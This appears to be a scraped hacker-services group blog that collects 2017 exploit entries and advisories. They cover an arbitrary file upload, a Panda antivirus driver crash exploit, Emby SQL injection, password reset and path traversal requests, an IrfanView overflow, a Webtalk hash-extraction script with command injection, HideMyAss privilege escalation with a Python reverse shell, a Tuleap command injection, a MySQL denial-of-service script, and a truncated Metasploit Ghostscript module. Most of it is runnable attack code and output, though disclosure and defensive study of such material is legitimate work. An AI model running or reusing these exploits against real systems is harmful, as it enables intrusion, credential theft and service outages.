# Exploit Title: Easy File Uploader - Arbitrary File Upload
# Date: 27/04/2017
# Exploit Author: Daniel Godoy
# Vendor Homepage: https://codecanyon.net/
# Software Link: https://codecanyon.net/item/easy-file-uploader-php-multiple-uploader-with-file-manager/17222287
# Tested on: GNU/Linux
# GREETZ: Rodrigo Mouriño, Rodrigo Avila, #RemoteExecution Team
POC
Drop file php (shell.php) to upload.
access to http://poc_site/fileFolder/shell.php and enjoy!
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863532673
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
/*
# Exploit Title: Panda Cloud Antivirus Free - 'PSKMAD.sys' - BSoD - denial of service
# Date: 2017-04-29
# Exploit Author: Peter baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: http://download.cnet.com/Panda-Cloud-Antivirus-Free-Edition/3000-2239_4-10914099.html?part=dl-&subj=dl&tag=button&lang=en
# Version: 18.0
# Tested on: Windows 7 SP1 Pro x64, Windows 10 Pro x64
# CVE : requested
*/
#include "stdafx.h"
#include <stdio.h>
#include <Windows.h>
#include <winioctl.h>
#define DEVICE_NAME L"\\\\.\\PSMEMDriver"
LPCTSTR FileName = (LPCTSTR)DEVICE_NAME;
HANDLE GetDeviceHandle(LPCTSTR FileName) {
HANDLE hFile = NULL;
hFile = CreateFile(FileName,
GENERIC_READ | GENERIC_WRITE,
0,
0,
OPEN_EXISTING,
NULL,
0);
return hFile;
}
int main()
{
HANDLE hFile = NULL;
PVOID64 lpInBuffer = NULL;
ULONG64 lpBytesReturned;
PVOID64 BuffAddress = NULL;
SIZE_T BufferSize = 0x800;
printf("Trying the get the handle for the PSMEMDriver device.\r\n");
hFile = GetDeviceHandle(FileName);
if (hFile == INVALID_HANDLE_VALUE) {
printf("Can't get the device handle, no BSoD today. 0x%X\r\n", GetLastError());
return 1;
}
// Allocate memory for our buffer
lpInBuffer = VirtualAlloc(NULL, BufferSize, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (lpInBuffer == NULL) {
printf("VirtualAlloc() failed. \r\n");
return 1;
}
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer));
*(PULONG64)BuffAddress = (ULONG64)0x542DF91B; //Pool header tag???
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x4));
*(PULONG64)BuffAddress = (ULONG64)0x42424242;
BuffAddress = (PVOID64)(((ULONG64)lpInBuffer + 0x8));
RtlFillMemory(BuffAddress, BufferSize-0x8 , 0x41);
DeviceIoControl(hFile,
0xb3702c38,
lpInBuffer,
NULL, //Change it to BufferSize and put a bp PSKMAD+3150 -> rax will point to our buffer in the kernel memory
NULL,
NULL,
&lpBytesReturned,
NULL);
/*This part is pretty much useless, just wanted to be nice in case the machine survives.*/
printf("Cleaning up.\r\n");
VirtualFree((LPVOID)lpInBuffer, sizeof(lpInBuffer), MEM_RELEASE);
CloseHandle(hFile);
printf("Resources freed up.\r\n");
return 0;
}
Emby MediaServer 3.2.5 Boolean-based Blind SQL Injection Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: Emby suffers from a blind SQL injection vulnerability. Input passed via the GET
parameter 'MediaTypes' is not properly sanitised before being returned to the user
or used in SQL queries. This can be exploited to manipulate SQL queries by injecting
arbitrary SQL code.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5400
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5400.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
PoC:
GET /emby/Users/abb355429db54e159ac2a7a3cbd6eb12/Items?ParentId=4cd160cad6c50f34ca42be0136af2316&Filters=IsNotFolder&Recursive=true&SortBy=SortName&MediaTypes=Audio%2cVideo'&Limit=100&Fields=MediaSources%2CChapters&ExcludeLocationTypes=Virtual HTTP/1.1
Host: 10.211.55.3:8096
accept: application/json
x-mediabrowser-token: ba5a68dfa1134bd6af642228bbf757bb
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome 55.0.2883.87", DeviceId="104a154d5aa8c9576a2508113b47a53b6170253c", Version="3.1.0.0", UserId="abb355429db54e159ac2a7a3cbd6eb12"
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
Response:
HTTP/1.1 500 Internal Server Error
Content-Type: text/html
Server: Mono-HTTPAPI/1.0
Date: Tue, 21 Feb 2017 12:06:09 GMT
Content-Length: 64
Connection: close
Exception of type 'SQLitePCL.pretty.SQLiteException' was thrown.
Emby MediaServer 3.2.5 Password Reset Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The issue can be triggered by an unauthenticated actor within the home network
(LAN) only. The attacker doesn't need to specify a valid username to reset the
password. He or she can enter a random string, and using the file disclosure issue
it's possible to read the PIN needed for resetting. This in turn will disclose all
the valid usernames in the emby server and reset all the passwords for all the users
with a blank password. Attackers can exploit this to gain unauthenticated and unauthorized
access to the emby media server management interface.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5401
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5401.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
1. First we initiate the Forgot Password feature from within our home network:
------------------------------------------------------------------------------
http://10.211.55.3:8096/web/forgotpassword.html
2. Then, we type any random username and hit submit:
----------------------------------------------------
POST /emby/Users/ForgotPassword HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 32
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpassword.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
EnteredUsername=RandomusUsuarius
3. You will get an alert message (Windows/Linux):
-------------------------------------------------
The following file has been created on your server and contains instructions on how to proceed:
C:\Users\lqwrm\AppData\Roaming\\Emby-Server\passwordreset.txt
-- OR --
/var/lib/emby-server/passwordreset.txt
4. Exploiting the file disclosure vulnerability (ZSL-2017-5403):
----------------------------------------------------------------
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\Users\lqwrm\AppData\Roaming\Emby-Server\passwordreset.txt HTTP/1.1
Host: 10.211.55.3:8096
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Connection: close
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "c4fd834ac2fc99ff99d74c8e994a8a71"
Cache-Control: public
Expires: -1
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: text/plain
Date: Tue, 28 Feb 2017 12:14:51 GMT
Content-Length: 164
Connection: close
Use your web browser to visit:
http://10.211.55.3:8096/web/forgotpasswordpin.html
Enter the following pin code:
6727
The pin code will expire at 91
5. Following the instructions, entering the PIN, results in resetting all the passwords for all the emby users on the system:
-----------------------------------------------------------------------------------------------------------------------------
POST /emby/Users/ForgotPassword/Pin HTTP/1.1
Host: 10.211.55.3:8096
Connection: keep-alive
Content-Length: 9
accept: application/json
Origin: http://10.211.55.3:8096
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
x-emby-authorization: MediaBrowser Client="Emby Mobile", Device="Chrome", DeviceId="3848bd099140288b429e5189456c7354b531fc6b", Version="3.2.5.0"
content-type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://10.211.55.3:8096/web/forgotpasswordpin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8,mk;q=0.6
DNT: 1
Pin=6272
---
We get the message:
Passwords have been removed for the following users. To login, sign in with a blank password.
testingus
test321
beebee
admin
ztefan
lio
miko
dni
embyusertest
joxypoxy
test123
thricer
teppei
admin2
delf1na
Emby MediaServer 3.2.5 Directory Traversal File Disclosure Vulnerability
Vendor: Emby LLC
Product web page: https://www.emby.media
Affected version: 3.2.5
3.1.5
3.1.2
3.1.1
3.1.0
3.0.0
Summary: Emby (formerly Media Browser) is a media server designed to organize,
play, and stream audio and video to a variety of devices. Emby is open-source,
and uses a client-server model. Two comparable media servers are Plex and Windows
Media Center.
Desc: The vulnerability was confirmed on tested platforms depending on the version.
Version 3.1.0 is affecting Linux, Windows and Mac platforms. The 3.2.5 only affects
Windows release. Input passed via the 'swagger-ui' object in SwaggerService.cs is not
properly verified before being used to load resources. This can be exploited to disclose
the contents of arbitrary files via directory traversal attacks.
================================================================================
/Emby.Server.Implementations/HttpServer/SwaggerService.cs:
----------------------------------------------------------
using MediaBrowser.Controller;
using MediaBrowser.Controller.Net;
using System.IO;
using MediaBrowser.Model.IO;
using MediaBrowser.Model.Services;
namespace Emby.Server.Implementations.HttpServer
{
public class SwaggerService : IService, IRequiresRequest
{
private readonly IServerApplicationPaths _appPaths;
private readonly IFileSystem _fileSystem;
public SwaggerService(IServerApplicationPaths appPaths, IFileSystem fileSystem, IHttpResultFactory resultFactory)
{
_appPaths = appPaths;
_fileSystem = fileSystem;
_resultFactory = resultFactory;
}
/// <summary>
/// Gets the specified request.
/// </summary>
/// <param name="request">The request.</param>
/// <returns>System.Object.</returns>
public object Get(GetSwaggerResource request)
{
var swaggerDirectory = Path.Combine(_appPaths.ApplicationResourcesPath, "swagger-ui");
var requestedFile = Path.Combine(swaggerDirectory, request.ResourceName.Replace('/', _fileSystem.DirectorySeparatorChar));
return _resultFactory.GetStaticFileResult(Request, requestedFile).Result;
}
/// <summary>
/// Gets or sets the result factory.
/// </summary>
/// <value>The result factory.</value>
private readonly IHttpResultFactory _resultFactory;
/// <summary>
/// Gets or sets the request context.
/// </summary>
/// <value>The request context.</value>
public IRequest Request { get; set; }
}
}
================================================================================
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Ubuntu Linux 14.04.5
MacOS Sierra 10.12.3
SQLite3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5403
Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2017-5403.php
SSD Advisory: https://blogs.securiteam.com/index.php/archives/3098
22.12.2016
--
GET /emby/swagger-ui/..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
HTTP/1.1 200 OK
X-UA-Compatible: IE=Edge
Access-Control-Allow-Headers: Content-Type, Authorization, Range, X-MediaBrowser-Token, X-Emby-Authorization
Access-Control-Allow-Methods: GET, POST, PUT, DELETE, PATCH, OPTIONS
Access-Control-Allow-Origin: *
Vary: Accept-Encoding
ETag: "07bec80f76d20d26dd300a855219d321"
Cache-Control: public
Server: Mono-HTTPAPI/1.1, UPnP/1.0 DLNADOC/1.50
Content-Type: application/octet-stream
Date: Thu, 22 Dec 2016 10:43:53 GMT
Content-Length: 403
Connection: close
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
[MCI Extensions.BAK]
3g2=MPEGVideo
3gp=MPEGVideo
3gp2=MPEGVideo
3gpp=MPEGVideo
aac=MPEGVideo
adt=MPEGVideo
adts=MPEGVideo
m2t=MPEGVideo
m2ts=MPEGVideo
m2v=MPEGVideo
m4a=MPEGVideo
m4v=MPEGVideo
mod=MPEGVideo
mov=MPEGVideo
mp4=MPEGVideo
mp4v=MPEGVideo
mts=MPEGVideo
ts=MPEGVideo
tts=MPEGVideo
==========================
On Linux:
http://127.0.0.1/%2femby%2fswagger-ui%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
...
...
# Exploit Title: Irfanview - OtherExtensions Input Overflow
# Date: 29-04-2017
# Software Link: http://download.cnet.com/IrfanView/?part=dl-&subj=dl&tag=button
# Exploit Author: Dreivan Orprecio
#Version: Irfanview 4.44
#Irfanview is vulnerable to overflow in "OtherExtensions" input field
#Debugging Machine: WinXP Pro SP3 (32bit)
#POC
#!usr/bin/python
eip = "\xf7\x56\x44\x7e" #jmp esp from user32.dll
buffer = "OtherExtensions="+"A" * 199 + eip + "\xcc"
print buffer #a) irfanview->Option->Properties/Settings->Extensions
#b) Paste the buffer in the "other" input then press ok, repeat a) and b)
#badcharacters: those instruction that start with 6,7,8,E,F
#Only 43 bytes space to host a shellcode and lots of badchars make it hard for this to exploit
#Any other way around this?
'''
Security Issues in Alerton Webtalk
==================================
Introduction
------------
Vulnerabilities were identified in the Alerton Webtalk Software supplied by
Alerton. This software is used for the management of building automation
systems. These were discovered during a black box assessment and therefore
the vulnerability list should not be considered exhaustive. Alerton has
responded that Webtalk is EOL and past the end of its support period. Customers
should move to newer products available from Alerton. Thanks to Alerton for prompt
replies in communicating with us about these issues.
Versions 2.5 and 3.3 were both confirmed to be affected by these issues.
Webtalk-01 - Password Hashes Accessible to Unauthenticated Users
----------------------------------------------------------------
Severity: **High**
Password hashes for all of the users configured in Alerton Webtalk are
accessible via a file in the document root of the ‘webtalk’ user. The
location of this file is configuration dependent, however the configuration file is
accessible as well (at a static location, /~webtalk/webtalk.ini). The
password
database is a sqlite3 database whose name is based on the bacnet rep and job
entries from the ini file.
A python proof of concept to reproduce this issue is in an appendix.
Recommendation: Do not store sensitive data within areas being served by the
webserver.
Webtalk-02 - Command Injection for Authenticated Webtalk Users
--------------------------------------------------------------
Severity: **High**
Any user granted the “configure webtalk” permission can execute commands as
the root user on the underlying server. There appears to be some effort of
filtering command strings (such as rejecting commands containing pipes and
redirection operators) but this is inadequate. Using this vulnerability, an
attacker can add an SSH key to the root user’s authorized_keys file.
GET
/~webtalk/WtStatus.psp?c=update&updateopts=&updateuri=%22%24%28id%29%22&update=True
HTTP/1.1
Host: test-host
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101
Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: NID=...; _SID_=...; OGPC=...:
Connection: close
Upgrade-Insecure-Requests: 1
HTTP/1.1 200 OK
Date: Mon, 23 Jan 2017 20:34:26 GMT
Server: Apache
cache-control: no-cache
Set-Cookie: _SID_=...; Path=/;
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 2801
...
uid=0(root) gid=500(webtalk) groups=500(webtalk)
...
Recommendation: User input should be avoided to shell commands. If this is
not possible, shell commands should be properly escaped. Consider using one of
the functions from the subprocess module without the shell=True parameter.
Webtalk-03 - Cross-Site Request Forgery
---------------------------------------
Severity: **High**
The entire Webtalk administrative interface lacks any controls against
Cross-Site Request Forgery. This allows an attacker to execute
administrative changes without access to valid credentials. Combined with the above
vulnerability, this allows an attacker to gain root access without any
credentials.
Recommendation: Implement CSRF tokens on all state-changing actions.
Webtalk-04 - Insecure Credential Hashing
----------------------------------------
Severity: **Moderate**
Password hashes in the userprofile.db database are hashed by concatenating
the password with the username (e.g., PASSUSER) and performing a plain MD5
hash. No salts or iterative hashing is performed. This does not follow password
hashing best practices and makes for highly practical offline attacks.
Recommendation: Use scrypt, bcrypt, or argon2 for storing password hashes.
Webtalk-05 - Login Flow Defeats Password Hashing
------------------------------------------------
Severity: **Moderate**
Password hashing is performed on the client side, allowing for the replay of
password hashes from Webtalk-01. While this only works on the mobile login
interface (“PDA” interface, /~webtalk/pda/pda_login.psp), the resulting
session is able to access all resources and is functionally equivalent to a login
through the Java-based login flow.
Recommendation: Perform hashing on the server side and use TLS to protect
secrets in transit.
Timeline
--------
2017/01/?? - Issues Discovered
2017/01/26 - Issues Reported to security@honeywell.com
2017/01/30 - Initial response from Alerton confirming receipt.
2017/02/04 - Alerton reports Webtalk is EOL and issues will not be fixed.
2017/04/26 - This disclosure
Discovery
---------
These issues were discovered by David Tomaschik of the Google ISA
Assessments team.
Appendix A: Script to Extract Hashes
------------------------------------
'''
import requests
import sys
import ConfigParser
import StringIO
import sqlite3
import tempfile
import os
def get_webtalk_ini(base_url):
"""Get the webtalk.ini file and parse it."""
url = '%s/~webtalk/webtalk.ini' % base_url
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get webtalk.ini: %s', url)
buf = StringIO.StringIO(r.text)
parser = ConfigParser.RawConfigParser()
parser.readfp(buf)
return parser
def get_db_path(base_url, config):
rep = config.get('bacnet', 'rep')
job = config.get('bacnet', 'job')
url = '%s/~webtalk/bts/%s/%s/userprofile.db'
return url % (base_url, rep, job)
def load_db(url):
"""Load and read the db."""
r = requests.get(url)
if r.status_code != 200:
raise RuntimeError('Unable to get %s.' % url)
tmpfd, tmpname = tempfile.mkstemp(suffix='.db')
tmpf = os.fdopen(tmpfd, 'w')
tmpf.write(r.content)
tmpf.close()
con = sqlite3.connect(tmpname)
cur = con.cursor()
cur.execute("SELECT UserID, UserPassword FROM tblPassword")
results = cur.fetchall()
con.close()
os.unlink(tmpname)
return results
def users_for_server(base_url):
if '://' not in base_url:
base_url = 'http://%s' % base_url
ini = get_webtalk_ini(base_url)
db_path = get_db_path(base_url, ini)
return load_db(db_path)
if __name__ == '__main__':
for host in sys.argv[1:]:
try:
users = users_for_server(host)
except Exception as ex:
sys.stderr.write('%s\n' % str(ex))
continue
for u in users:
print '%s:%s' % (u[0], u[1])
Source: https://www.securify.nl/advisory/SFY20170402/multiple_local_privilege_escalation_vulnerabilities_in_hidemyass_pro_vpn_client_v2_x_for_os_x.html
Abstract
Multiple local privilege escalation vulnerabilities were found in the helper binary HMAHelper that ships with HideMyAss Pro VPN for OS X. The helper is installed setuid root and responsible for loading Kernel Extensions (kext) and managing VPN firewall rules. These issues can be leveraged by a local attacker to gain elevated (root) privileges.
Tested versions:
This issue was tested on HMA Pro VPN version 2.2.7.0 for OS X
Fix:
HMA Support has reported that this issue will not be fixed. Version 2.2.7.0. is still available for download and was earlier this year also available in the Mac App Store. It seems that this version is still available for older versions of OS X (OS X 10.7 - 10.11).
It should be noted the latest version of HMA Pro VPN for OS X (version 3.3.0.3) is vulnerable to a similar local privilege escalation issue that is also not fixed at the time of writing.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for OS X. It was discovered that version 2.x of HMA Pro VPN for OS X is affected by multiple local privilege escalation vulnerabilities.
Details:
The helper binary HMAHelper that ships with HMA Pro VPN for OS X is installed as setuid root. The helper has the ability to execute several commands as root, including running kernal extentions (kext) but also enabling and disabling security firewall rules.
Although disabling the firewall is dangerous enough, it was found that the helper is affected by multiple local privilege escalation vulnerabilities. Taking the FirewallDisable rule as an example, the code snippet below shows that there is no limit to which executable can be executed allowing a local user (or malware) to run any executable as root.
Privax.OSX.HMA.Helper.FirewallManager
private static void FirewallDisableSelected(string path, string args, string processNames)
{
using (Process process = new Process())
{
ProcessStartInfo startInfo = process.StartInfo;
startInfo.FileName = "/usr/bin/sudo";
startInfo.Arguments = string.Format("\"{0}\" \"{1}\" \"{2}\"", (object) path, (object) args, (object) processNames);
startInfo.CreateNoWindow = true;
startInfo.UseShellExecute = false;
PermissionsManager.PermissionsSet(PermissionsManager.UIDRoot, PermissionsManager.GIDWheel);
process.Start();
process.WaitForExit();
}
}
Proof of concept:
/Applications/HMA\!\ Pro\ VPN.app/Contents/Resources/Applications/HMAHelper.app/Contents/MacOS/HMAHelper --sib-firewall-enable 'su' ''
Source: https://www.securify.nl/advisory/SFY20170408/local_privilege_escalation_vulnerability_in_hidemyass_pro_vpn_client_v3_x_for_macos.html
Abstract
A local privilege escalation vulnerability has been found in the helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS. The helper is installed setuid root and uses the openvpn binary to create VPN profiles and connections. The helper fails to perform signature check's on the openvpn file, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
Tested versions:
This issue was tested on HideMyAss Pro VPN v3.3.0.3 for macOS.
Fix:
There is currently no fix available.
Introduction:
HideMyAss is a popular VPN service that allows users to hide their identity and browse anonymously online. HideMyAss also provides applications to setup the VPN connections, including a client for macOS. It was discovered that version 3.x of HMA Pro VPN for macOS is affected by local privilege escalation.
Details:
The helper binary com.privax.hmaprovpn.helper that ships with HideMyAss Pro VPN v3.3.0.3 for macOS is installed in PrivilegedHelperTools and run every time the user reboots. The privileged helper is responsible for opening VPN connections with correct security and connection profile settings.
The com.privax.hmaprovpn.helper is installed setuid root and fails to perform signature check's on the openvpn executable, which is owned by the user that installed the client. This allows malware on the system to replace the openvpn binary and run arbitrary code as root.
/advisory/SFY20170408/runopenvpnasroot.png
/advisory/SFY20170408/startopenvpn.png
Proof of Concept:
1) Create an Python script named openvpn and make sure it is executable (chmod u+x).
#!/usr/bin/python
import socket,subprocess,os;
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);
s.connect(("10.0.0.28",8099));os.dup2(s.fileno(),0);
os.dup2(s.fileno(),1);
os.dup2(s.fileno(),2);
p=subprocess.call(["/bin/sh","-i"]);
2) Replace the openvpn binary located in the path below with this Python script.
/Applications/HMA\!\ Pro\ VPN.app/Contents/XPCServices/HMA\!\ Pro\ VPN\ Engine.xpc/Contents/MacOS/
3) Wait until the victim opens a VPN connection.
# Tuleap - Command Injection in Project Wiki
**CVE:** CVE-2017-7981
**CVSSv3:** 9.4 (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P/RL:U/RC:C)
**Versions affected:** >= 8.3 and <= 9.6.99.86
## Introduction
Tuleap is a Libre suite to plan, track, code and collaborate on software
projects. Tuleap helps development teams to build awesome applications,
better, faster, easier.
## Background
Tuleap uses PHPWiki as a plugin to provide a weak feature for
projects. The version of PHPWiki used is 1.3.10. This version contains a
command injection vulnerability in the SyntaxHighlighter plugin. Other
applications that use PHPWiki similar to Tuleap will also be affected
by this issue.
The latest version of PHPWiki is 1.5.5 and is no longer vulnerable to this issue.
## Vulnerability
Authenticated users, including unprivileged users, with access to a
project containing a wiki, can exploit this command injection
(CI) vulnerability to gain remote unauthorised access to the server
hosting the Tuleap web application.
RCE is achieved by entering a SyntaxHighlighter plugin directive in a
new wiki page on any wiki available in any project. The SyntaxHighligter
plugin in vulnerable versions of PHPWiki passes the `syntax` argument
to the `proc_open()` PHP builtin function which spawns a process in the
operating system running the web application.
The following is an example plugin directie which would cause the `id(1)`
command to be executed on a Linux server running an affected version
of Tuleap.
```
<?plugin SyntaxHighlighter syntax="c;id"
code to be highlighted
?>
```
The result of the command execution can be seen in the image below.
## Versions Affected
This vulnerability has existed in the version of PHPWiki used by the
Tuleap project since at least version 8.3 through to 9.6.99.86.
## References
https://github.com/xdrr/vulnerability-research/blob/master/webapp/tuleap/2017.04.tuleap-auth-ci.md
https://tuleap.net/plugins/tracker/?aid=10159
## Credit
This vulnerability was discovered by Ben N (pajexali@gmail.com) 19
April 2017.
'''
# Source: https://raw.githubusercontent.com/SECFORCE/CVE-2017-3599/master/cve-2017-3599_poc.py
# Exploit Title: Remote MySQL DOS (Integer Overflow)
# Google Dork: N/A
# Date: 13th April 2017
# Exploit Author: Rodrigo Marcos
# Vendor Homepage: https://www.mysql.com/
# Software Link: https://www.mysql.com/downloads/
# Version: 5.6.35 and below / 5.7.17 and below
# Tested on: N/A
# CVE : CVE-2017-3599
'''
import socket
import sys
from struct import pack
'''
CVE-2017-3599 Proof of Concept exploit code.
https://www.secforce.com/blog/2017/04/cve-2017-3599-pre-auth-mysql-remote-dos/
Rodrigo Marcos
'''
if len(sys.argv)<2:
print "Usage: python " + sys.argv[0] + " host [port]"
exit(0)
else:
HOST = sys.argv[1]
if len(sys.argv)>2:
PORT = int(sys.argv[2]) # Yes, no error checking... living on the wild side!
else:
PORT = 3306
print "[+] Creating packet..."
'''
3 bytes Packet lenth
1 bytes Packet number
Login request:
Packet format (when the server is 4.1 or newer):
Bytes Content
----- ----
4 client capabilities
4 max packet size
1 charset number
23 reserved (always 0)
n user name, \0-terminated
n plugin auth data (e.g. scramble), length encoded
n database name, \0-terminated
(if CLIENT_CONNECT_WITH_DB is set in the capabilities)
n client auth plugin name - \0-terminated string,
(if CLIENT_PLUGIN_AUTH is set in the capabilities)
'''
# packet_len = '\x64\x00\x00'
packet_num = '\x01'
#Login request packet
packet_cap = '\x85\xa2\xbf\x01' # client capabilities (default)
packet_max = '\x00\x00\x00\x01' # max packet size (default)
packet_cset = '\x21' # charset (default)
p_reserved = '\x00' * 23 # 23 bytes reserved with nulls (default)
packet_usr = 'test\x00' # username null terminated (default)
packet_auth = '\xff' # both \xff and \xfe crash the server
'''
Conditions to crash:
1 - packet_auth must start with \xff or \xfe
2 - packet_auth must be shorter than 8 chars
The expected value is the password, which could be of two different formats
(null terminated or length encoded) depending on the client functionality.
'''
packet = packet_cap + packet_max + packet_cset + p_reserved + packet_usr + packet_auth
packet_len = pack('i',len(packet))[:3]
request = packet_len + packet_num + packet
print "[+] Connecting to host..."
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((HOST, PORT))
print "[+] Connected."
except:
print "[+] Unable to connect to host " + HOST + " on port " + str(PORT) + "."
s.close()
print "[+] Exiting."
exit(0)
print "[+] Receiving greeting from remote host..."
data = s.recv(1024)
print "[+] Done."
print "[+] Sending our payload..."
s.send(request)
print "[+] Done."
#print "Our data: %r" % request
s.close()
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit
Rank = ExcellentRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution',
'Description' => %q{
This module exploits a type confusion vulnerability in Ghostscript that can
be exploited to obtain arbitrary command execution. This vulnerability affects
Ghostscript version 9.21 and earlier and can be exploited through libraries
such as ImageMagick and Pillow.
},
'Author' => [
'Atlassian Security Team', # Vulnerability discovery
'hdm' # Metasploit module
],
'References' => [
%w{CVE 2017-8291},
%w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808},
%w{URL http://seclists.org/oss-sec/2017/q2/148},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d},
%w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3}
],
'DisclosureDate' => 'Apr 27 2017',
'License' => MSF_LICENSE,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Privileged' => false,
'Payload' => {
'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and )
'Compat' => {
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic netcat bash-tcp'
}
},
'Targets' => [
['EPS file', template: 'msf.eps']
],
'DefaultTarget' => 0,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_netcat',
'LHOST' => Rex::Socket.source_address,
'DisablePayloadHandler' => false,
'WfsDelay' => 9001
}
))
register_options([
OptString.new('FILENAME', [true, 'Output file', 'msf.eps'])
])
end
# Example usage from the bug tracker:
